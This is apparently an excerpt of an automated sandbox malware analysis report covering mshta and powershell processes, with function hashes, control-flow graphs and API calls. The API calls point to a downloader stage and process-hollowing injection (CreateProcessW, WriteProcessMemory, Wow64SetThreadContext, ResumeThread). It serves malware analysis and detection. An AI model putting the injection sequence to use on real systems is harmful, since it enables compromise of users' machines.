                                                        Function 03750FB9 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000003.406020583.0000000003750000.00000010.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_3_3750000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 377030c2138ab9a35897f8319153199091d0001d61e4c591b97cf33f0a763eb9
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash:

                                                        Execution Graph

                                                        Execution Coverage:4.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:3
                                                        Total number of Limit Nodes:0
                                                        execution_graph 3831 7fe899b7ae1 3833 7fe899b7af1 URLDownloadToFileW 3831->3833 3834 7fe899b7c00 3833->3834

                                                        Executed Functions

                                                        Function 000007FE899B7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.430954303.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe899b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: DownloadFile
                                                        • String ID:
                                                        • API String ID: 1407266417-0
                                                        • Opcode ID: bfd0817e0d9f0d9b53ce26fec69c51a9986ebb173b4ab4b37d78c130f1513db3
                                                        • Instruction ID: 46c243d09054ab40253488f3e5ce1efcd0ed19cd4b9d56ea58fdf58971caab7f
                                                        • Opcode Fuzzy Hash: bfd0817e0d9f0d9b53ce26fec69c51a9986ebb173b4ab4b37d78c130f1513db3
                                                        • Instruction Fuzzy Hash: A0319131918A5C9FDB58EF5CD8897B9B7E1FB69321F00822ED04DD3661CB74B8058B81
                                                        Function 000007FE89A84775 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (F|$8F|
                                                        • API String ID: 0-2149209761
                                                        • Opcode ID: 3ac9ae19db09d76824e0295901c8e00a20690fc75118f3bf0fc7735805d88a93
                                                        • Instruction ID: 9ab7d69ace76f2375d71b4c8356fbcfa62a0714b1537f01eab1ef865fa200290
                                                        • Opcode Fuzzy Hash: 3ac9ae19db09d76824e0295901c8e00a20690fc75118f3bf0fc7735805d88a93
                                                        • Instruction Fuzzy Hash: 19C1573091DAC94FE74AA72C94547BABFE1FF46784F1401EAD44EDB2A3D618AC12C361
                                                        Function 000007FE89A810D3 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8h:$xF|
                                                        • API String ID: 0-4105707869
                                                        • Opcode ID: 1015a5a0d7b98c64e085e5481155fced844f18e8430cdfe02785a4efc861bcc6
                                                        • Instruction ID: f92a4cb4493973ebf836f3e9bdea7540f2b9cdd36be2d0fd546c887022013a41
                                                        • Opcode Fuzzy Hash: 1015a5a0d7b98c64e085e5481155fced844f18e8430cdfe02785a4efc861bcc6
                                                        • Instruction Fuzzy Hash: 3A41AF11A0DBC90FE34B933C6864364BFE1EF5B259B2901EBC48ECB1A3D9099C568361
                                                        Function 000007FE899B7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.430954303.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe899b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: DownloadFile
                                                        • String ID:
                                                        • API String ID: 1407266417-0
                                                        • Opcode ID: ae11ca3b073b036b9c49a96c2ad35bfd071a57fd259931aa57f4ccdfa08bb56d
                                                        • Instruction ID: 09dbe4eff7c93bd60af26e2bbd03176807ae0be541b8008077dd7616fc7286d9
                                                        • Opcode Fuzzy Hash: ae11ca3b073b036b9c49a96c2ad35bfd071a57fd259931aa57f4ccdfa08bb56d
                                                        • Instruction Fuzzy Hash: 5441F67181CB989FD715DB589C547AABBF0FB56321F04426FD08DD35A2CB646806CB81
                                                        Function 000007FE89A886A9 Relevance: .7, Instructions: 718COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 7fe89a886a9-7fe89a886d0 99 7fe89a8868f-7fe89a88698 97->99 100 7fe89a886d2-7fe89a88708 97->100 102 7fe89a88699-7fe89a886a5 99->102 100->102 105 7fe89a8870a-7fe89a88759 100->105 106 7fe89a88c3d-7fe89a88cf6 105->106 107 7fe89a8875f-7fe89a88769 105->107 108 7fe89a8876b-7fe89a88778 107->108 109 7fe89a88782-7fe89a88789 107->109 108->109 110 7fe89a8877a-7fe89a88780 108->110 111 7fe89a8878b-7fe89a8879e 109->111 112 7fe89a887a0 109->112 110->109 114 7fe89a887a2-7fe89a887a4 111->114 112->114 117 7fe89a88bb8-7fe89a88bc2 114->117 118 7fe89a887aa-7fe89a887b6 114->118 119 7fe89a88bd5-7fe89a88be5 117->119 120 7fe89a88bc4-7fe89a88bd4 117->120 118->106 121 7fe89a887bc-7fe89a887c6 118->121 123 7fe89a88be7-7fe89a88beb 119->123 124 7fe89a88bf2-7fe89a88c3c 119->124 125 7fe89a887c8-7fe89a887d5 121->125 126 7fe89a887e2-7fe89a887f2 121->126 123->124 125->126 127 7fe89a887d7-7fe89a887e0 125->127 126->117 131 7fe89a887f8-7fe89a8882c 126->131 127->126 131->117 137 7fe89a88832-7fe89a8883e 131->137 137->106 138 7fe89a88844-7fe89a8884e 137->138 139 7fe89a88867-7fe89a8886c 138->139 140 7fe89a88850-7fe89a8885d 138->140 139->117 142 7fe89a88872-7fe89a88877 139->142 140->139 141 7fe89a8885f-7fe89a88865 140->141 141->139 142->117 143 7fe89a8887d-7fe89a88882 142->143 143->117 144 7fe89a88888-7fe89a88897 143->144 146 7fe89a888a7 144->146 147 7fe89a88899-7fe89a888a3 144->147 150 7fe89a888ac-7fe89a888b9 146->150 148 7fe89a888c3-7fe89a8894e 147->148 149 7fe89a888a5 147->149 157 7fe89a88950-7fe89a8895b 148->157 158 7fe89a88962-7fe89a88984 148->158 149->150 150->148 151 7fe89a888bb-7fe89a888c1 150->151 151->148 157->158 159 7fe89a88986-7fe89a88990 158->159 160 7fe89a88994 158->160 161 7fe89a889b0-7fe89a88a3e 159->161 162 7fe89a88992 159->162 163 7fe89a88999-7fe89a889a6 160->163 170 7fe89a88a40-7fe89a88a4b 161->170 171 7fe89a88a52-7fe89a88a70 161->171 162->163 163->161 164 7fe89a889a8-7fe89a889ae 163->164 164->161 170->171 172 7fe89a88a80 171->172 173 7fe89a88a72-7fe89a88a7c 171->173 176 7fe89a88a85-7fe89a88a93 172->176 174 7fe89a88a9d-7fe89a88b2d 173->174 175 7fe89a88a7e 173->175 183 7fe89a88b2f-7fe89a88b3a 174->183 184 7fe89a88b41-7fe89a88b9a 174->184 175->176 176->174 178 7fe89a88a95-7fe89a88a9b 176->178 178->174 183->184 187 7fe89a88ba2-7fe89a88bb7 184->187
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70dd4a4c95b6af7aff3b97b7872a79423829a920cc4069bfaf23e10e7aab4529
                                                        • Instruction ID: 4a0577d5d139b19a115dc91dff0e1dcada076adba86f67e5b480930baf943c0e
                                                        • Opcode Fuzzy Hash: 70dd4a4c95b6af7aff3b97b7872a79423829a920cc4069bfaf23e10e7aab4529
                                                        • Instruction Fuzzy Hash: 9E22163090CB894FE799DB2C8854679BBE2FF8A344F2401EAD45ED72A3DA24AC55C741
                                                        Function 000007FE89A85C7D Relevance: .5, Instructions: 457COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 188 7fe89a85c7d-7fe89a85c87 189 7fe89a85c89 188->189 190 7fe89a85c8e-7fe89a85c9f 188->190 189->190 191 7fe89a85c8b 189->191 192 7fe89a85ca6-7fe89a85cb7 190->192 193 7fe89a85ca1 190->193 191->190 195 7fe89a85cb9 192->195 196 7fe89a85cbe-7fe89a85ccf 192->196 193->192 194 7fe89a85ca3 193->194 194->192 195->196 197 7fe89a85cbb 195->197 198 7fe89a85cd6-7fe89a85ce7 196->198 199 7fe89a85cd1 196->199 197->196 200 7fe89a85ce9 198->200 201 7fe89a85cee-7fe89a85d38 198->201 199->198 202 7fe89a85cd3 199->202 200->201 203 7fe89a85ceb 200->203 204 7fe89a85d3a-7fe89a85d40 201->204 205 7fe89a85d95-7fe89a85d9c 201->205 202->198 203->201 206 7fe89a85d9d-7fe89a85daa 204->206 207 7fe89a85d42-7fe89a85d92 204->207 205->206 208 7fe89a85db0-7fe89a85dba 206->208 209 7fe89a85f13-7fe89a85fdc 206->209 207->205 210 7fe89a85dbc-7fe89a85dc9 208->210 211 7fe89a85dd3-7fe89a85dd8 208->211 210->211 213 7fe89a85dcb-7fe89a85dd1 210->213 214 7fe89a85dde-7fe89a85de1 211->214 215 7fe89a85eb3-7fe89a85ebd 211->215 213->211 218 7fe89a85e26 214->218 219 7fe89a85de3-7fe89a85df2 214->219 216 7fe89a85ebf-7fe89a85ecd 215->216 217 7fe89a85ece-7fe89a85ede 215->217 221 7fe89a85eeb-7fe89a85f10 217->221 222 7fe89a85ee0-7fe89a85ee4 217->222 223 7fe89a85e28-7fe89a85e2a 218->223 219->209 227 7fe89a85df8-7fe89a85e02 219->227 221->209 222->221 223->215 226 7fe89a85e30-7fe89a85e36 223->226 229 7fe89a85e38-7fe89a85e45 226->229 230 7fe89a85e52-7fe89a85e94 226->230 232 7fe89a85e1b-7fe89a85e24 227->232 233 7fe89a85e04-7fe89a85e11 227->233 229->230 234 7fe89a85e47-7fe89a85e50 229->234 242 7fe89a85e9a-7fe89a85eb2 230->242 232->223 233->232 236 7fe89a85e13-7fe89a85e19 233->236 234->230 236->232
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd691862fd6e6e1d215e56f8d690554d9b77f45eb35af49e80f9f0fa99ad2e18
                                                        • Instruction ID: 8d3128732ab726f84680d421e954cd65ace10246b5b2c83c8b53b080f4733995
                                                        • Opcode Fuzzy Hash: dd691862fd6e6e1d215e56f8d690554d9b77f45eb35af49e80f9f0fa99ad2e18
                                                        • Instruction Fuzzy Hash: 5AD1147080E7C90FD357A73898546B57FE0EF47260F1911EBD48DDB0A3D619A85AC3A2

                                                        Non-executed Functions

                                                        Function 000007FE89A8330E Relevance: .4, Instructions: 379COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.431024786.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_7fe89a80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2eeedd9d8e04da31804b3991e9344b7d37ab045d735e02f24823d178b1e48d07
                                                        • Instruction ID: fb254cea977dcb68475b029cce613f260c7aec4ca8ea0a45cca19af07cd87805
                                                        • Opcode Fuzzy Hash: 2eeedd9d8e04da31804b3991e9344b7d37ab045d735e02f24823d178b1e48d07
                                                        • Instruction Fuzzy Hash: E1C1D22080E7C60FE757977848656A57FF1EF47254F1A01EBC489DB0A3DA1CAC5AC362

                                                        Execution Graph

                                                        Execution Coverage:9.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:12
                                                        Total number of Limit Nodes:0
                                                        execution_graph 2158 7fe899d734d 2160 7fe899d735b WriteProcessMemory 2158->2160 2161 7fe899d74d4 2160->2161 2162 7fe899d6e49 2163 7fe899d6e57 Wow64SetThreadContext 2162->2163 2165 7fe899d6fa1 2163->2165 2166 7fe899d7539 2167 7fe899d7547 ResumeThread 2166->2167 2169 7fe899d761c 2167->2169 2170 7fe899d6a15 2171 7fe899d6a40 CreateProcessW 2170->2171 2173 7fe899d6cd0 2171->2173

                                                        Executed Functions

                                                        Function 000007FE89AA114E Relevance: 7.4, Strings: 5, Instructions: 1164COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7fe89aa114e-7fe89aa11d4 2 7fe89aa11da-7fe89aa11e4 0->2 3 7fe89aa13c3-7fe89aa146d 0->3 4 7fe89aa11e6-7fe89aa11f3 2->4 5 7fe89aa11fd-7fe89aa1202 2->5 37 7fe89aa1470-7fe89aa1481 3->37 38 7fe89aa146f 3->38 4->5 7 7fe89aa11f5-7fe89aa11fb 4->7 8 7fe89aa1208-7fe89aa120b 5->8 9 7fe89aa1364-7fe89aa136e 5->9 7->5 12 7fe89aa120d-7fe89aa1220 8->12 13 7fe89aa1222 8->13 10 7fe89aa137d-7fe89aa138d 9->10 11 7fe89aa1370-7fe89aa137c 9->11 16 7fe89aa139a-7fe89aa13c0 10->16 17 7fe89aa138f-7fe89aa1393 10->17 14 7fe89aa1224-7fe89aa1226 12->14 13->14 14->9 19 7fe89aa122c-7fe89aa1263 14->19 16->3 17->16 25 7fe89aa1287 19->25 26 7fe89aa1265-7fe89aa1285 19->26 28 7fe89aa1289-7fe89aa128b 25->28 26->28 28->9 31 7fe89aa1291-7fe89aa1294 28->31 32 7fe89aa1296-7fe89aa12a9 31->32 33 7fe89aa12ab 31->33 34 7fe89aa12ad-7fe89aa12af 32->34 33->34 34->9 39 7fe89aa12b5-7fe89aa12ef 34->39 40 7fe89aa1484-7fe89aa1514 37->40 41 7fe89aa1483 37->41 38->37 54 7fe89aa1308-7fe89aa130e 39->54 55 7fe89aa12f1-7fe89aa12fe 39->55 42 7fe89aa164d-7fe89aa16f9 40->42 43 7fe89aa151a-7fe89aa1524 40->43 41->40 92 7fe89aa16fc-7fe89aa170d 42->92 93 7fe89aa16fb 42->93 45 7fe89aa1526-7fe89aa1533 43->45 46 7fe89aa153d-7fe89aa1542 43->46 45->46 47 7fe89aa1535-7fe89aa153b 45->47 49 7fe89aa1548-7fe89aa154b 46->49 50 7fe89aa15ee-7fe89aa15f8 46->50 47->46 56 7fe89aa154d-7fe89aa1560 49->56 57 7fe89aa1562 49->57 52 7fe89aa1607-7fe89aa1617 50->52 53 7fe89aa15fa-7fe89aa1606 50->53 58 7fe89aa1619-7fe89aa161d 52->58 59 7fe89aa1624-7fe89aa164a 52->59 62 7fe89aa132a-7fe89aa132d 54->62 63 7fe89aa1310-7fe89aa131d 54->63 55->54 61 7fe89aa1300-7fe89aa1306 55->61 64 7fe89aa1564-7fe89aa1566 56->64 57->64 58->59 59->42 61->54 68 7fe89aa1334-7fe89aa133d 62->68 63->62 66 7fe89aa131f-7fe89aa1328 63->66 64->50 67 7fe89aa156c-7fe89aa156f 64->67 66->62 71 7fe89aa1596 67->71 72 7fe89aa1571-7fe89aa1594 67->72 74 7fe89aa1356-7fe89aa1363 68->74 75 7fe89aa133f-7fe89aa134c 68->75 76 7fe89aa1598-7fe89aa159a 71->76 72->76 75->74 80 7fe89aa134e-7fe89aa1354 75->80 76->50 81 7fe89aa159c-7fe89aa15b8 76->81 80->74 87 7fe89aa15be-7fe89aa15c7 81->87 88 7fe89aa15c9-7fe89aa15d6 87->88 89 7fe89aa15e0-7fe89aa15ed 87->89 88->89 91 7fe89aa15d8-7fe89aa15de 88->91 91->89 94 7fe89aa1710-7fe89aa17a4 92->94 95 7fe89aa170f 92->95 93->92 97 7fe89aa17aa-7fe89aa17b4 94->97 98 7fe89aa1902-7fe89aa19ad 94->98 95->94 99 7fe89aa17b6-7fe89aa17c3 97->99 100 7fe89aa17cd-7fe89aa17d2 97->100 135 7fe89aa19b0-7fe89aa19c1 98->135 136 7fe89aa19af 98->136 99->100 104 7fe89aa17c5-7fe89aa17cb 99->104 101 7fe89aa17d8-7fe89aa17db 100->101 102 7fe89aa18a3-7fe89aa18ad 100->102 105 7fe89aa17dd-7fe89aa17f0 101->105 106 7fe89aa17f2 101->106 107 7fe89aa18bc-7fe89aa18cc 102->107 108 7fe89aa18af-7fe89aa18bb 102->108 104->100 110 7fe89aa17f4-7fe89aa17f6 105->110 106->110 112 7fe89aa18d9-7fe89aa18ff 107->112 113 7fe89aa18ce-7fe89aa18d2 107->113 110->102 114 7fe89aa17fc-7fe89aa17ff 110->114 112->98 113->112 116 7fe89aa1816 114->116 117 7fe89aa1801-7fe89aa1814 114->117 119 7fe89aa1818-7fe89aa181a 116->119 117->119 119->102 120 7fe89aa1820-7fe89aa1826 119->120 122 7fe89aa1828-7fe89aa1835 120->122 123 7fe89aa1842-7fe89aa1848 120->123 122->123 126 7fe89aa1837-7fe89aa1840 122->126 124 7fe89aa184a-7fe89aa1857 123->124 125 7fe89aa1864-7fe89aa18a2 123->125 124->125 128 7fe89aa1859-7fe89aa1862 124->128 126->123 128->125 137 7fe89aa19c4-7fe89aa1a43 135->137 138 7fe89aa19c3 135->138 136->135 139 7fe89aa1abf-7fe89aa1ac9 137->139 140 7fe89aa1a45-7fe89aa1a5a 137->140 138->137 142 7fe89aa1acb-7fe89aa1ad4 139->142 143 7fe89aa1ad5-7fe89aa1ae5 139->143 140->139 141 7fe89aa1a5c-7fe89aa1a69 140->141 146 7fe89aa1a7d-7fe89aa1abc 141->146 147 7fe89aa1a6b-7fe89aa1a76 141->147 144 7fe89aa1ae7-7fe89aa1aeb 143->144 145 7fe89aa1af2-7fe89aa1b15 143->145 144->145 146->139 147->146
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (be$XhI$XhI$r68$r68
                                                        • API String ID: 0-3442194146
                                                        • Opcode ID: c9617e4c57d6181de3cc8a4e85977b9453593b45eae6a95bb6859bba1193e290
                                                        • Instruction ID: b9e3c5ea7d233efd28f2f4bca6cf9321e92a695f74aed775d7596ab78a64153d
                                                        • Opcode Fuzzy Hash: c9617e4c57d6181de3cc8a4e85977b9453593b45eae6a95bb6859bba1193e290
                                                        • Instruction Fuzzy Hash: BB72F420A1DBCA0FE757A73858642B57FE1EF87254F1901EBD08ECB1A3DA18AC59C351
                                                        Function 000007FE89AA3219 Relevance: 6.7, Strings: 4, Instructions: 1715COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 150 7fe89aa3219-7fe89aa322f 151 7fe89aa3249-7fe89aa324f 150->151 152 7fe89aa3231-7fe89aa323f 150->152 154 7fe89aa334e-7fe89aa3358 151->154 155 7fe89aa3255-7fe89aa3258 151->155 152->151 153 7fe89aa3241-7fe89aa3247 152->153 153->151 156 7fe89aa336b-7fe89aa337b 154->156 157 7fe89aa335a-7fe89aa336a 154->157 158 7fe89aa325a-7fe89aa326d 155->158 159 7fe89aa32a1 155->159 161 7fe89aa3388-7fe89aa33b6 156->161 162 7fe89aa337d-7fe89aa3381 156->162 168 7fe89aa33b9-7fe89aa343b 158->168 169 7fe89aa3273-7fe89aa327d 158->169 160 7fe89aa32a3-7fe89aa32a5 159->160 160->154 164 7fe89aa32ab-7fe89aa32ae 160->164 161->168 162->161 164->154 166 7fe89aa32b4-7fe89aa32b7 164->166 166->154 170 7fe89aa32bd-7fe89aa32fb 166->170 188 7fe89aa343d-7fe89aa3461 168->188 171 7fe89aa3296-7fe89aa329f 169->171 172 7fe89aa327f-7fe89aa328c 169->172 170->154 180 7fe89aa32fd-7fe89aa3303 170->180 171->160 172->171 174 7fe89aa328e-7fe89aa3294 172->174 174->171 181 7fe89aa3305-7fe89aa3312 180->181 182 7fe89aa3322-7fe89aa3338 180->182 181->182 184 7fe89aa3314-7fe89aa3320 181->184 185 7fe89aa333e-7fe89aa334d 182->185 184->182 191 7fe89aa346d-7fe89aa3479 188->191 192 7fe89aa3463-7fe89aa3469 188->192 193 7fe89aa347b-7fe89aa3481 191->193 194 7fe89aa3485-7fe89aa34a1 191->194 192->191 193->194 194->188 195 7fe89aa34a3-7fe89aa34b4 194->195 196 7fe89aa34e7-7fe89aa3502 195->196 197 7fe89aa34b6-7fe89aa34e6 195->197 198 7fe89aa354c-7fe89aa3551 196->198 199 7fe89aa3504-7fe89aa3531 196->199 197->196 202 7fe89aa355b-7fe89aa3560 198->202 203 7fe89aa3553-7fe89aa3559 198->203 200 7fe89aa3537-7fe89aa3541 199->200 201 7fe89aa3773-7fe89aa378b 199->201 200->202 204 7fe89aa3543-7fe89aa354b 200->204 213 7fe89aa378d-7fe89aa37d3 201->213 214 7fe89aa37d5-7fe89aa3827 201->214 205 7fe89aa3566-7fe89aa3569 202->205 206 7fe89aa3702-7fe89aa370c 202->206 203->202 204->198 211 7fe89aa356b-7fe89aa357e 205->211 212 7fe89aa3580 205->212 208 7fe89aa371f-7fe89aa372f 206->208 209 7fe89aa370e 206->209 216 7fe89aa373c 208->216 217 7fe89aa3731-7fe89aa3735 208->217 215 7fe89aa370f-7fe89aa371e 209->215 218 7fe89aa3582-7fe89aa3584 211->218 212->218 213->214 235 7fe89aa3829-7fe89aa3831 214->235 236 7fe89aa3832-7fe89aa38a5 214->236 220 7fe89aa373d-7fe89aa3772 216->220 217->216 218->206 219 7fe89aa358a-7fe89aa35be 218->219 230 7fe89aa35c0-7fe89aa35d3 219->230 231 7fe89aa35d5 219->231 232 7fe89aa35d7-7fe89aa35d9 230->232 231->232 232->206 234 7fe89aa35df-7fe89aa35e2 232->234 234->206 237 7fe89aa35e8-7fe89aa35eb 234->237 235->236 238 7fe89aa35ed-7fe89aa3600 237->238 239 7fe89aa3602 237->239 240 7fe89aa3604-7fe89aa3606 238->240 239->240 240->206 241 7fe89aa360c-7fe89aa360f 240->241 241->206 242 7fe89aa3615-7fe89aa364f 241->242 245 7fe89aa3668-7fe89aa3675 242->245 246 7fe89aa3651-7fe89aa365e 242->246 248 7fe89aa3689-7fe89aa368f 245->248 249 7fe89aa3677-7fe89aa3682 245->249 246->245 247 7fe89aa3660-7fe89aa3666 246->247 247->245 250 7fe89aa3691-7fe89aa3693 248->250 251 7fe89aa3700-7fe89aa3701 248->251 249->248 250->215 253 7fe89aa3695 250->253 254 7fe89aa3697-7fe89aa36ae 253->254 255 7fe89aa36dc-7fe89aa36dd 253->255 256 7fe89aa36df-7fe89aa36e7 254->256 257 7fe89aa36b0-7fe89aa36d8 254->257 255->220 255->256 258 7fe89aa36e9 256->258 259 7fe89aa36eb-7fe89aa36f0 256->259 257->255 260 7fe89aa36f1-7fe89aa36ff 258->260 259->260 260->251
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457609393.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe89aa0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UA$(UA$(UA$P*B
                                                        • API String ID: 0-1137719822
                                                        • Opcode ID: e9947343767892b9e7834f6cef7a7f072bed02b8f0e5cfebbf00d34a08c8aad1
                                                        • Instruction ID: 97b38e2516b46b321842a1c0f29ddbfdaf8ca644ba0f4e368429829e15bf3f5f
                                                        • Opcode Fuzzy Hash: e9947343767892b9e7834f6cef7a7f072bed02b8f0e5cfebbf00d34a08c8aad1
                                                        • Instruction Fuzzy Hash: A432053090DBCA0FE75AA72858552B97FE1EF47654F1901EFD08ECB1A3DA14AC16C352
                                                        Function 000007FE899D6A15 Relevance: 1.9, APIs: 1, Instructions: 377processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 262 7fe899d6a15-7fe899d6adf 265 7fe899d6afb-7fe899d6b0b 262->265 266 7fe899d6ae1-7fe899d6af8 262->266 267 7fe899d6b0d-7fe899d6b24 265->267 268 7fe899d6b27-7fe899d6b7a 265->268 266->265 267->268 269 7fe899d6b7c-7fe899d6b9c 268->269 270 7fe899d6ba2-7fe899d6cce CreateProcessW 268->270 269->270 274 7fe899d6cd6-7fe899d6dc4 call 7fe899d6dc5 270->274 275 7fe899d6cd0 270->275 275->274
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 6fbb493ebca9c2ebc7febf9aeef3ac203d3126e6a608d17a9c511be9fb9b8564
                                                        • Instruction ID: c520a3553d0faae5ec02d8e15920356abc44fa4ee08ce24f121291532a3fd93c
                                                        • Opcode Fuzzy Hash: 6fbb493ebca9c2ebc7febf9aeef3ac203d3126e6a608d17a9c511be9fb9b8564
                                                        • Instruction Fuzzy Hash: 1EC11870908A5D8FDB99DF18C894BE9BBF1FB59311F0001AAD04EE3261DB75AA84CF40
                                                        Function 000007FE899D5378 Relevance: 1.9, APIs: 1, Instructions: 362processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 286 7fe899d5378-7fe899d6adf 289 7fe899d6afb-7fe899d6b0b 286->289 290 7fe899d6ae1-7fe899d6af8 286->290 291 7fe899d6b0d-7fe899d6b24 289->291 292 7fe899d6b27-7fe899d6b7a 289->292 290->289 291->292 293 7fe899d6b7c-7fe899d6b9c 292->293 294 7fe899d6ba2-7fe899d6cce CreateProcessW 292->294 293->294 298 7fe899d6cd6-7fe899d6dc4 call 7fe899d6dc5 294->298 299 7fe899d6cd0 294->299 299->298
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 7b20864257b386df1ad63a1835cb39b32f76f6c3a876812bf44790b78397a9ac
                                                        • Instruction ID: 10be96e03f96c47c0324021103c8d25f5b03352fb7a19909bb5468575b1a710f
                                                        • Opcode Fuzzy Hash: 7b20864257b386df1ad63a1835cb39b32f76f6c3a876812bf44790b78397a9ac
                                                        • Instruction Fuzzy Hash: 6DC10870908A5D8FDB99DF18C894BE9B7F1FB69301F1011AE944EE3661DB75AA80CF40
                                                        Function 000007FE899D734D Relevance: 1.7, APIs: 1, Instructions: 212injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 310 7fe899d734d-7fe899d7359 311 7fe899d735b-7fe899d7363 310->311 312 7fe899d7364-7fe899d7411 310->312 311->312 315 7fe899d7439-7fe899d74d2 WriteProcessMemory 312->315 316 7fe899d7413-7fe899d7436 312->316 317 7fe899d74da-7fe899d7536 315->317 318 7fe899d74d4 315->318 316->315 318->317
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.457454458.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_7fe899d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
